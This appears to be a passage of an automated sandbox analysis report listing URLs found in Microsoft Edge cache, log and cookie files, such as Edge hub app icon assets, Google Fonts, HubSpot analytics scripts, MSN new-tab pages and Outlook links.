          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
          Source: HubApps Icons.18.dr, 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
          Source: HubApps Icons.18.dr, 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
          Source: HubApps Icons.18.dr, 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
          Source: HubApps Icons.18.dr, 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
          Source: 000003.log5.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
          Source: HubApps Icons.18.dr, 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
          Source: HubApps Icons.18.dr, 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
          Source: HubApps Icons.18.dr, 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
          Source: HubApps Icons.18.dr, 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
          Source: 000003.log5.18.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
          Source: chromecache_816.2.drString found in binary or memory: https://fontawesome.com
          Source: chromecache_816.2.drString found in binary or memory: https://fontawesome.com/license/free
          Source: chromecache_789.2.dr, chromecache_796.2.dr, chromecache_831.2.dr, chromecache_855.2.dr, chromecache_862.2.dr, chromecache_829.2.dr, chromecache_822.2.dr, chromecache_833.2.dr, chromecache_834.2.dr, chromecache_791.2.dr, chromecache_819.2.dr, chromecache_784.2.dr, chromecache_840.2.drString found in binary or memory: https://fonts.googleapis.com
          Source: chromecache_789.2.dr, chromecache_796.2.dr, chromecache_831.2.dr, chromecache_855.2.dr, chromecache_862.2.dr, chromecache_829.2.dr, chromecache_822.2.dr, chromecache_833.2.dr, chromecache_834.2.dr, chromecache_791.2.dr, chromecache_819.2.dr, chromecache_784.2.dr, chromecache_840.2.drString found in binary or memory: https://fonts.gstatic.com
          Source: chromecache_828.2.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa0ZL7SUc.woff2)
          Source: chromecache_828.2.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa1ZL7.woff2)
          Source: chromecache_828.2.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa1pL7SUc.woff2)
          Source: chromecache_828.2.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa25L7SUc.woff2)
          Source: chromecache_828.2.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa2JL7SUc.woff2)
          Source: chromecache_828.2.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa2ZL7SUc.woff2)
          Source: chromecache_828.2.drString found in binary or memory: https://fonts.gstatic.com/s/inter/v19/UcC73FwrK3iLTeHuS_nVMrMxCp50SjIa2pL7SUc.woff2)
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://gaana.com/
          Source: chromecache_844.2.drString found in binary or memory: https://github.com/atfzl/eslint-plugin-css-modules/pull/82
          Source: chromecache_861.2.drString found in binary or memory: https://github.com/microsoft/clarity
          Source: chromecache_820.2.drString found in binary or memory: https://google.com/ccm/form-data
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://google.com/pagead/form-data
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://googleads.g.doubleclick.net/pagead/viewthroughconversion
          Source: chromecache_805.2.drString found in binary or memory: https://help.vimeo.com/hc/en-us/articles/115015677227-Troubleshoot-player-error-messages
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
          Source: 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
          Source: 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
          Source: chromecache_812.2.drString found in binary or memory: https://js-na1.hs-scripts.com/19524073.js
          Source: chromecache_821.2.drString found in binary or memory: https://js.hs-analytics.net/analytics/1749241200000/19524073.js
          Source: chromecache_850.2.drString found in binary or memory: https://js.hs-banner.com/v2
          Source: chromecache_821.2.drString found in binary or memory: https://js.hs-banner.com/v2/19524073/banner.js
          Source: chromecache_821.2.drString found in binary or memory: https://js.hsadspixel.net/fb.js
          Source: chromecache_821.2.drString found in binary or memory: https://js.hscollectedforms.net/collectedforms.js
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://m.kugou.com/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://m.soundcloud.com/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://m.vk.com/
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://m.youtube.com
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
          Source: chromecache_862.2.dr, chromecache_829.2.drString found in binary or memory: https://medium.com/anthemis-insights/why-we-invested-elevate-d5e8da342b4a
          Source: Cookies.19.drString found in binary or memory: https://msn.comXANDR_PANID/
          Source: Cookies.19.drString found in binary or memory: https://msn.comXANDR_PANIDv10K
          Source: Cookies.19.drString found in binary or memory: https://msn.comXID/
          Source: Cookies.19.drString found in binary or memory: https://msn.comXIDv10
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://music.amazon.com
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://music.apple.com
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://music.yandex.com
          Source: 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://ntp.msn.cn/bundles/v1/edgeChromium
          Source: 4cb013792b196a35_1.18.dr, 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
          Source: 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://ntp.msn.cn/edge/ntp?
          Source: 000003.log7.18.drString found in binary or memory: https://ntp.msn.com
          Source: 000003.log0.18.dr, 000003.log9.18.drString found in binary or memory: https://ntp.msn.com/
          Source: 000003.log0.18.drString found in binary or memory: https://ntp.msn.com/0
          Source: QuotaManager.18.drString found in binary or memory: https://ntp.msn.com/_default
          Source: 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://ntp.msn.com/bundles/v1/edgeChromium
          Source: 4cb013792b196a35_1.18.dr, 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://ntp.msn.com/edge/ntp
          Source: 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
          Source: 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://ntp.msn.com/edge/ntp?
          Source: Tabs_13393715138446333.18.drString found in binary or memory: https://ntp.msn.com/edge/ntp?&form=MT004B&OCID=MT004B
          Source: Tabs_13393715138446333.18.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
          Source: QuotaManager.18.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
          Source: 2cc80dabc69f58b6_0.18.dr, 4cb013792b196a35_0.18.drString found in binary or memory: https://ntp.msn.comservice-worker-allowed:/report-to:
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://open.spotify.com
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://outlook.live.com/mail/0/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://outlook.office.com/mail/0/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
